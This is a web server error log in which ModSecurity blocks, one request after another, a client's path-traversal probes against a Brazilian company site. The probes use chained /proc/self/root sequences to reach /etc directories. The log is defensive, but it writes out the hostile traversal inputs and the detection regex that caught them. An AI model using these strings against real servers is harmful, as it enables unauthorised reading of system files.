https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:11:24.072067 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:35300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhnOyqAr6etmhZHNotIgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:56.048210 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:35310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhvAbLMZ6AikZjR9Um_QAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:57.427464 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:57484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhveoXxyEfFpUF8f_aUwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:11:58.802974 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:57490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhvl_V7PWP6ixUYl6FYAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:00.970876 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.244.43:51590] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuhwNa6ubjKNq_cu4YJfwAAA1Y"]
[Thu Mar 19 04:12:04.908939 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:57506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhxBkFeYa1D6dYQnC2ygAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:06.202761 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:57510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhxuoXxyEfFpUF8f_aVQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:07.490979 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:59648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhx-oXxyEfFpUF8f_aVgAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:08.839208 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:59662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhyBkFeYa1D6dYQnC2zwAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:10.118727 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:59666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhyvu8EFLIOrSqIptnVQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:15.179735 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:59678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuhzwbLMZ6AikZjR9UnBwAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:16.578063 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:59686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh0Na6ubjKNq_cu4YJlgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:17.890653 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:52490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh0V_V7PWP6ixUYl6FdAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:21.602260 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:52504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh1da6ubjKNq_cu4YJnAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:22.983108 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:52512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh1sdf6f5d65gmYZQ8cQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:25.848261 2026] [mime_magic:error] [pid 17653:tid 140411607643904] (70014)End of file found: [client 57.141.18.124:37958] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:12:29.935364 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.241.31:52520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh3V_V7PWP6ixUYl6FhQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:31.265496 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:46410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh39a6ubjKNq_cu4YJpwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:33.524207 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:46416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh4Na6ubjKNq_cu4YJqQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:34.898674 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:46428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh4gkwaGbbGflqUZB9yQAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:36.235362 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.241.31:46434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh5P-YZRR_7pZ7nDJWigAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:37.612233 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:59478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh5eyqAr6etmhZHNotPwAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:41.099104 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:59492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 